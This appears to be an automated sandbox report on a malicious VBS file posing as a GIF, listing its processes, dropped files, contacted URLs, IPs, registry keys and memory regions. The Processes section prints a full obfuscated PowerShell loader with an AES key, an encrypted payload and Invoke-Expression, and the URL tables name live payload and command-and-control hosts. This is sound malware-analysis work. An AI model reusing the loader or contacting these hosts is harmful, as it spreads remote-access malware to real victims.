Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
createactiveimagesbeautygirlfrnd.gIF.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsftexbx.hx4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fig4okvo.32s.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\createactiveimagesbeautygirlfrnd.gIF.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged
= New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g
= [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key
= ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes
= [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes
= TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return
[System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI31045819173442745210226027008389CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64
= '+'CnIgROtij99MoqAl/1G6M0vqbtZNqaPOCvjW7wdfeQ2dm55MRRbSDL2dTjprdiVH4QRo9tuowqh9VUVcWHVl7wdpldrVYCVSlBSHKYYtX3y3EC19QGlIL2fuyXvSxhXzrCpIXVHSexgj/ylJqNpMqCRbGFmQ7b0X+QTYTuCcqP+5yOBN4O6atlPw9w8pPhK9OTe6qU1yD4u4I80Cm5MU98/PR4+8ywARZuaKE5pEc8m1O4Ku1/SjPgmLSinIDTNFgago2s309DvIv/fkTnnaxJJczMR5wDbQltFtGUCrdEGLC3QBCwcPMgT1xJ0gL7Ve4guK6HuDNkBARVx6IE3AsAcjSL8uN9O0YKkXZEyQFJY1x6z5q3ahy4Xxler3uLigmmxVv2bdi4UGe5zCCvgmZwAlk6A/59+vdpW/EApuL514/a+Us8piX4u0JPOtD/FDvCmST/nbK2n2paq0EHKxXMwpkzKA1e+BUpnxwXJrfWegtDerIVzkg4xcqmje/DZ1H6Bw6vOf7gbPCwnFhiOKYIlAUdEBwJQtctWrQXdrXo3BEIBT1iE51b3Ojwza1v/g2n2T89FWu55Ux7+dXeIf/O2oMp2w4BJQAWnE2xjfpMi8oCUaCfhIMYRUWU1jgqQLc20g1WDprYvcHmu/6WCfwKaZBxu2z+Dc8hoJblkIz6G02yRyV03HspeACrW1WOgOWNnx9NyLIR6QGyZDyySjqrZgvZX2eD0jEY/V4HSH4zkwVsY3946yvCZswuFKgBbCPhD+J/kkL82M6ZPLi5i+j/So2Di9yY5G1LQWpa/f21tFFWNALSnPpWZdIwDAUgc2jlgpS7d7owMPgN6mz5coCsW9NZ1UoebwAvfaX+oRKQ5t4PfHDWuSPgE1KN0mwHl53Hcv2snX7vYYfSpZT6NkY++2xTpeXo+wxcnj2u+K0vmB0GqKc/f4jAuzCGMbcbLLRbx1LnOgRNjOWQZO7twOygr6YzL5MR1KK76WIXLJPTrooLwxOcbA09by8F2V9p+AZjUTmbcGHANFIIQjyWDooeg0zffos+sGI2tr+sGif31XZRdk5TGul9q7WHoMauH7x8xeSJY8ba38e/dCsFUMyBE7HV40jAXlGVJ3rxJI2PNkH2P8jPlmKDcONW2RmaifAYWeGMRGhTt4k1orKVFZi3eJD4zgS2+RDViMcp4NNW8SVqhy+EqIQx/8s1JDCT0kgYFf8i88r+i3XTRgoU+2mySon8QoxRya6lglkmbykEhjvoCPgXrCea62Jbr2poBuYXqEt4X+bGR9DaCEefuC/8BCKU+6SZ5tMXp6Ohd/vZ3jRhMzP4KN+C5QYkBc0qhxnlUoX3at07CgYwnEtPcCGfxKEyP13rjbBZNm31t6ElJuHqKBjGiMZUmGKIIxSu8Zm9izO0koXrBn8GAP3xWeGpRlQ==CnI;TMItextoDescriptografado
= Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado:
TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34
-cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&(
$verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
2024remcmon.duckdns.org
|
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://198.46.176.133/Upload/vbs.jpeg
|
198.46.176.133
|
||
|
http://schemas.m0L
|
unknown
|
||
|
http://geoplugin.net/
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
http://geoplugin.net/json.gpl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://192.3.176.154/xampp/glo/KBV.txt
|
192.3.176.154
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://geoplugin.net/json.gpw
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://192.3.176.154
|
unknown
|
||
|
http://198.46.176.133
|
unknown
|
||
|
http://geoplugin.net/json.gpSystem32
|
unknown
|
There are 12 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
2024remcmon.duckdns.org
|
192.210.214.9
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.210.214.9
|
2024remcmon.duckdns.org
|
United States
|
|
|
|
192.3.176.154
|
unknown
|
United States
|
||
|
198.46.176.133
|
unknown
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
|
exepath
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
|
licence
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-R2I0JW
|
time
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
246335CF000
|
trusted library allocation
|
page read and write
|
|
|
|
122B000
|
heap
|
page read and write
|
|
|
|
246343D8000
|
trusted library allocation
|
page read and write
|
|
|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
2463B914000
|
heap
|
page read and write
|
||
|
7FFAACD70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2463B8C1000
|
heap
|
page read and write
|
||
|
1C7DAF5C000
|
heap
|
page read and write
|
||
|
FC3473F000
|
stack
|
page read and write
|
||
|
1C7DABF1000
|
heap
|
page read and write
|
||
|
2463B720000
|
heap
|
page execute and read and write
|
||
|
24621915000
|
heap
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
7FFAACEF0000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD0C000
|
heap
|
page read and write
|
||
|
1C7DAD62000
|
heap
|
page read and write
|
||
|
246338B8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
1C7DAEF0000
|
heap
|
page read and write
|
||
|
24621880000
|
heap
|
page readonly
|
||
|
246216E4000
|
heap
|
page read and write
|
||
|
FC34436000
|
stack
|
page read and write
|
||
|
24621733000
|
heap
|
page read and write
|
||
|
246217D0000
|
heap
|
page read and write
|
||
|
246235C1000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACEB0000
|
trusted library allocation
|
page read and write
|
||
|
1C7D8F95000
|
heap
|
page read and write
|
||
|
246217B5000
|
heap
|
page read and write
|
||
|
246335C1000
|
trusted library allocation
|
page read and write
|
||
|
246217C0000
|
heap
|
page read and write
|
||
|
1C7DB0A0000
|
heap
|
page read and write
|
||
|
2462171B000
|
heap
|
page read and write
|
||
|
1025000
|
heap
|
page read and write
|
||
|
7FFAACF5A000
|
trusted library allocation
|
page read and write
|
||
|
2462347C000
|
heap
|
page read and write
|
||
|
B8C000
|
stack
|
page read and write
|
||
|
1C7DAC16000
|
heap
|
page read and write
|
||
|
1C7DAC07000
|
heap
|
page read and write
|
||
|
246216F9000
|
heap
|
page read and write
|
||
|
2463B6C5000
|
heap
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
12A3000
|
heap
|
page read and write
|
||
|
1C7DAF74000
|
heap
|
page read and write
|
||
|
1220000
|
heap
|
page read and write
|
||
|
1C7DACFD000
|
heap
|
page read and write
|
||
|
1C7D8D70000
|
heap
|
page read and write
|
||
|
1C7DABF6000
|
heap
|
page read and write
|
||
|
FC3463E000
|
stack
|
page read and write
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
1C7DAD62000
|
heap
|
page read and write
|
||
|
1C7DAF81000
|
heap
|
page read and write
|
||
|
7FFAACBA3000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C7DABFF000
|
heap
|
page read and write
|
||
|
1C7DAC53000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
246216A0000
|
heap
|
page read and write
|
||
|
1C7DAC0D000
|
heap
|
page read and write
|
||
|
2463B65D000
|
heap
|
page read and write
|
||
|
1C7DABF6000
|
heap
|
page read and write
|
||
|
1C7DAC36000
|
heap
|
page read and write
|
||
|
7FFAACF00000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
7FFAACEE0000
|
trusted library allocation
|
page read and write
|
||
|
246216DB000
|
heap
|
page read and write
|
||
|
1C7DAF5F000
|
heap
|
page read and write
|
||
|
1C7DAF87000
|
heap
|
page read and write
|
||
|
FC3528D000
|
stack
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
10E0000
|
heap
|
page read and write
|
||
|
1C7D8DB2000
|
heap
|
page read and write
|
||
|
7FFAACF30000
|
trusted library allocation
|
page read and write
|
||
|
37BF000
|
stack
|
page read and write
|
||
|
7FFAACE90000
|
trusted library allocation
|
page read and write
|
||
|
24621870000
|
trusted library allocation
|
page read and write
|
||
|
24621800000
|
heap
|
page read and write
|
||
|
7FFAACEC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1C7DAC17000
|
heap
|
page read and write
|
||
|
7FFAACD90000
|
trusted library allocation
|
page execute and read and write
|
||
|
128F000
|
heap
|
page read and write
|
||
|
FC340FE000
|
stack
|
page read and write
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
FC341FE000
|
stack
|
page read and write
|
||
|
7FFAACED0000
|
trusted library allocation
|
page read and write
|
||
|
24626EBE000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAC0D000
|
heap
|
page read and write
|
||
|
1C7DAD54000
|
heap
|
page read and write
|
||
|
7FFAACF41000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAFD2000
|
heap
|
page read and write
|
||
|
7FFB1E3C5000
|
unkown
|
page readonly
|
||
|
24621890000
|
trusted library allocation
|
page read and write
|
||
|
478000
|
remote allocation
|
page execute and read and write
|
||
|
1C7DAFA3000
|
heap
|
page read and write
|
||
|
7FFAACE70000
|
trusted library allocation
|
page read and write
|
||
|
2462175A000
|
heap
|
page read and write
|
||
|
7FFB1E3B6000
|
unkown
|
page readonly
|
||
|
1000000
|
heap
|
page read and write
|
||
|
1C7DB001000
|
heap
|
page read and write
|
||
|
1C7DAC4B000
|
heap
|
page read and write
|
||
|
7FFAACF20000
|
trusted library allocation
|
page read and write
|
||
|
24633978000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAC4E000
|
heap
|
page read and write
|
||
|
474000
|
remote allocation
|
page execute and read and write
|
||
|
7FFAACDD0000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAEF1000
|
heap
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
FC34379000
|
stack
|
page read and write
|
||
|
350B000
|
stack
|
page read and write
|
||
|
7FFAACF10000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD45000
|
heap
|
page read and write
|
||
|
1ED54FE000
|
stack
|
page read and write
|
||
|
120D000
|
stack
|
page read and write
|
||
|
10C0000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
24623642000
|
trusted library allocation
|
page read and write
|
||
|
2463B6B3000
|
heap
|
page read and write
|
||
|
7FFAACCC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C7DAFD4000
|
heap
|
page read and write
|
||
|
1C7DAC57000
|
heap
|
page read and write
|
||
|
1C7D8D60000
|
heap
|
page read and write
|
||
|
7FFAACC5C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24621713000
|
heap
|
page read and write
|
||
|
32CE000
|
stack
|
page read and write
|
||
|
246246BE000
|
trusted library allocation
|
page read and write
|
||
|
24621820000
|
heap
|
page read and write
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
1C7DAFE1000
|
heap
|
page read and write
|
||
|
126C000
|
heap
|
page read and write
|
||
|
2463BCE0000
|
trusted library section
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C7DABFA000
|
heap
|
page read and write
|
||
|
1ED49E8000
|
stack
|
page read and write
|
||
|
FC347BC000
|
stack
|
page read and write
|
||
|
1C7DABFF000
|
heap
|
page read and write
|
||
|
1C7DAC42000
|
heap
|
page read and write
|
||
|
1C7DABF7000
|
heap
|
page read and write
|
||
|
1ED4CFE000
|
stack
|
page read and write
|
||
|
7FFAACE30000
|
trusted library allocation
|
page read and write
|
||
|
1C7DA750000
|
heap
|
page read and write
|
||
|
1ED56FB000
|
stack
|
page read and write
|
||
|
1C7DAC12000
|
heap
|
page read and write
|
||
|
37FE000
|
stack
|
page read and write
|
||
|
7DF41F050000
|
trusted library allocation
|
page execute and read and write
|
||
|
2CBF000
|
stack
|
page read and write
|
||
|
FC3518E000
|
stack
|
page read and write
|
||
|
7FFAACE40000
|
trusted library allocation
|
page read and write
|
||
|
FC346BE000
|
stack
|
page read and write
|
||
|
7FFB1E3A1000
|
unkown
|
page execute read
|
||
|
1C7DABFC000
|
heap
|
page read and write
|
||
|
1C7DAD3C000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
1C7DAC17000
|
heap
|
page read and write
|
||
|
129E000
|
heap
|
page read and write
|
||
|
2463B692000
|
heap
|
page read and write
|
||
|
7FFAACEA0000
|
trusted library allocation
|
page read and write
|
||
|
FC33DFF000
|
stack
|
page read and write
|
||
|
1C7DAD29000
|
heap
|
page read and write
|
||
|
1C7DAC39000
|
heap
|
page read and write
|
||
|
7FFAACDF0000
|
trusted library allocation
|
page read and write
|
||
|
24625ABE000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD48000
|
heap
|
page read and write
|
||
|
FC345BE000
|
stack
|
page read and write
|
||
|
1C7DAC31000
|
heap
|
page read and write
|
||
|
1C7DABF5000
|
heap
|
page read and write
|
||
|
1C7DAE6C000
|
heap
|
page read and write
|
||
|
1C7D8F90000
|
heap
|
page read and write
|
||
|
1C7DAD39000
|
heap
|
page read and write
|
||
|
1ED50FF000
|
stack
|
page read and write
|
||
|
24621850000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD82000
|
trusted library allocation
|
page read and write
|
||
|
1C7DACF0000
|
heap
|
page read and write
|
||
|
38FF000
|
stack
|
page read and write
|
||
|
1C7DAF5A000
|
heap
|
page read and write
|
||
|
7FFAACE00000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD59000
|
heap
|
page read and write
|
||
|
7FFAACF60000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAE6C000
|
heap
|
page read and write
|
||
|
2DFF000
|
stack
|
page read and write
|
||
|
7FFAACE50000
|
trusted library allocation
|
page read and write
|
||
|
1ED51FE000
|
stack
|
page read and write
|
||
|
1C7DABFF000
|
heap
|
page read and write
|
||
|
1C7DAC0C000
|
heap
|
page read and write
|
||
|
1C7DAD7A000
|
heap
|
page read and write
|
||
|
1C7D8DA0000
|
heap
|
page read and write
|
||
|
2463B62A000
|
heap
|
page read and write
|
||
|
1C7DACF1000
|
heap
|
page read and write
|
||
|
1C7DABF0000
|
heap
|
page read and write
|
||
|
FC3407E000
|
stack
|
page read and write
|
||
|
24623BB4000
|
trusted library allocation
|
page read and write
|
||
|
1C7D8F70000
|
heap
|
page read and write
|
||
|
1C7DAF59000
|
heap
|
page read and write
|
||
|
1C7DAC1E000
|
heap
|
page read and write
|
||
|
1C7DAF72000
|
heap
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
1C7DAC12000
|
heap
|
page read and write
|
||
|
24623B77000
|
trusted library allocation
|
page read and write
|
||
|
1C7DADC2000
|
heap
|
page read and write
|
||
|
FC3453B000
|
stack
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
354D000
|
stack
|
page read and write
|
||
|
7FFAACBAD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2463BB90000
|
heap
|
page read and write
|
||
|
1C7DAF7D000
|
heap
|
page read and write
|
||
|
1C7DAF7C000
|
heap
|
page read and write
|
||
|
364E000
|
stack
|
page read and write
|
||
|
7FFAACE60000
|
trusted library allocation
|
page read and write
|
||
|
2463B726000
|
heap
|
page execute and read and write
|
||
|
1C7D8DA9000
|
heap
|
page read and write
|
||
|
1ED4EFE000
|
stack
|
page read and write
|
||
|
340D000
|
stack
|
page read and write
|
||
|
246237E4000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF64000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD60000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACE20000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD09000
|
heap
|
page read and write
|
||
|
1C7DAD6F000
|
heap
|
page read and write
|
||
|
24621761000
|
heap
|
page read and write
|
||
|
1C7DABFB000
|
heap
|
page read and write
|
||
|
2463B8F1000
|
heap
|
page read and write
|
||
|
24623437000
|
trusted library allocation
|
page read and write
|
||
|
24621824000
|
heap
|
page read and write
|
||
|
1C7DAF7B000
|
heap
|
page read and write
|
||
|
246264BE000
|
trusted library allocation
|
page read and write
|
||
|
24621721000
|
heap
|
page read and write
|
||
|
1C7DAD21000
|
heap
|
page read and write
|
||
|
7FFAACBA4000
|
trusted library allocation
|
page read and write
|
||
|
246218F0000
|
heap
|
page execute and read and write
|
||
|
246235B0000
|
heap
|
page read and write
|
||
|
7FFAACDA0000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAC17000
|
heap
|
page read and write
|
||
|
2463B921000
|
heap
|
page read and write
|
||
|
1C7DAF78000
|
heap
|
page read and write
|
||
|
1C7DAD41000
|
heap
|
page read and write
|
||
|
1C7DAFA3000
|
heap
|
page read and write
|
||
|
1C7DAF79000
|
heap
|
page read and write
|
||
|
FC3427E000
|
stack
|
page read and write
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
7FFAACE10000
|
trusted library allocation
|
page read and write
|
||
|
FC342FD000
|
stack
|
page read and write
|
||
|
1C7DAC2A000
|
heap
|
page read and write
|
||
|
1ED4DFE000
|
stack
|
page read and write
|
||
|
246216D0000
|
heap
|
page read and write
|
||
|
2CFE000
|
stack
|
page read and write
|
||
|
1C7DAC06000
|
heap
|
page read and write
|
||
|
246245C6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDE0000
|
trusted library allocation
|
page read and write
|
||
|
FC3417C000
|
stack
|
page read and write
|
||
|
1C7DAFA3000
|
heap
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
1C7DABF8000
|
heap
|
page read and write
|
||
|
2463B8A0000
|
heap
|
page read and write
|
||
|
1ED55FE000
|
stack
|
page read and write
|
||
|
1C7DABF2000
|
heap
|
page read and write
|
||
|
246215C0000
|
heap
|
page read and write
|
||
|
1C7DABF6000
|
heap
|
page read and write
|
||
|
FC343BE000
|
stack
|
page read and write
|
||
|
1C7DAC19000
|
heap
|
page read and write
|
||
|
2463B911000
|
heap
|
page read and write
|
||
|
1C7DAC06000
|
heap
|
page read and write
|
||
|
24623A4E000
|
trusted library allocation
|
page read and write
|
||
|
1C7DABFB000
|
heap
|
page read and write
|
||
|
EFB000
|
stack
|
page read and write
|
||
|
1C7DB09F000
|
heap
|
page read and write
|
||
|
7FFB1E3C0000
|
unkown
|
page read and write
|
||
|
FC33D73000
|
stack
|
page read and write
|
||
|
1C7DADC0000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAFB1000
|
heap
|
page read and write
|
||
|
24623590000
|
heap
|
page execute and read and write
|
||
|
1C7DAF85000
|
heap
|
page read and write
|
||
|
246217B2000
|
heap
|
page read and write
|
||
|
24623BC6000
|
trusted library allocation
|
page read and write
|
||
|
FC344B8000
|
stack
|
page read and write
|
||
|
36BE000
|
stack
|
page read and write
|
||
|
2463B7A0000
|
heap
|
page read and write
|
||
|
1C7DAD24000
|
heap
|
page read and write
|
||
|
1C7DABF2000
|
heap
|
page read and write
|
||
|
246339D8000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
1C7DAC25000
|
heap
|
page read and write
|
||
|
7FFAACC86000
|
trusted library allocation
|
page execute and read and write
|
||
|
246338A9000
|
trusted library allocation
|
page read and write
|
||
|
24621910000
|
heap
|
page read and write
|
||
|
1C7DAC17000
|
heap
|
page read and write
|
||
|
7FFAACE80000
|
trusted library allocation
|
page read and write
|
||
|
1C7DABF4000
|
heap
|
page read and write
|
||
|
33CF000
|
stack
|
page read and write
|
||
|
1C7DAF5F000
|
heap
|
page read and write
|
||
|
1C7DB000000
|
heap
|
page read and write
|
||
|
2463B610000
|
heap
|
page read and write
|
||
|
1C7D8DDF000
|
heap
|
page read and write
|
||
|
7FFAACBB0000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD11000
|
heap
|
page read and write
|
||
|
7FFAACBBB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACD40000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACF51000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD5A000
|
heap
|
page read and write
|
||
|
1C7DAD5F000
|
heap
|
page read and write
|
||
|
7FFAACDB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBA2000
|
trusted library allocation
|
page read and write
|
||
|
1ED53FD000
|
stack
|
page read and write
|
||
|
1C7DAD71000
|
heap
|
page read and write
|
||
|
1C7DAC02000
|
heap
|
page read and write
|
||
|
24623BBD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACDC0000
|
trusted library allocation
|
page read and write
|
||
|
2463B7C0000
|
heap
|
page read and write
|
||
|
24623400000
|
trusted library allocation
|
page read and write
|
||
|
FC3520E000
|
stack
|
page read and write
|
||
|
2463362F000
|
trusted library allocation
|
page read and write
|
||
|
2463B8EE000
|
heap
|
page read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
24623B99000
|
trusted library allocation
|
page read and write
|
||
|
24623430000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
7FFB1E3C2000
|
unkown
|
page readonly
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
1C7D8E47000
|
heap
|
page read and write
|
||
|
1C7DAFB0000
|
heap
|
page read and write
|
||
|
7FFAACD51000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1E3A0000
|
unkown
|
page readonly
|
||
|
7FFAACD5A000
|
trusted library allocation
|
page read and write
|
||
|
1020000
|
heap
|
page read and write
|
||
|
246250BE000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD51000
|
heap
|
page read and write
|
||
|
1C7DABFF000
|
heap
|
page read and write
|
||
|
1C7DAC3E000
|
heap
|
page read and write
|
||
|
7FFAACC56000
|
trusted library allocation
|
page read and write
|
||
|
1C7DAD76000
|
heap
|
page read and write
|
||
|
1C7DAC58000
|
heap
|
page read and write
|
||
|
1C7DAC19000
|
heap
|
page read and write
|
There are 321 hidden memdumps, click here to show them.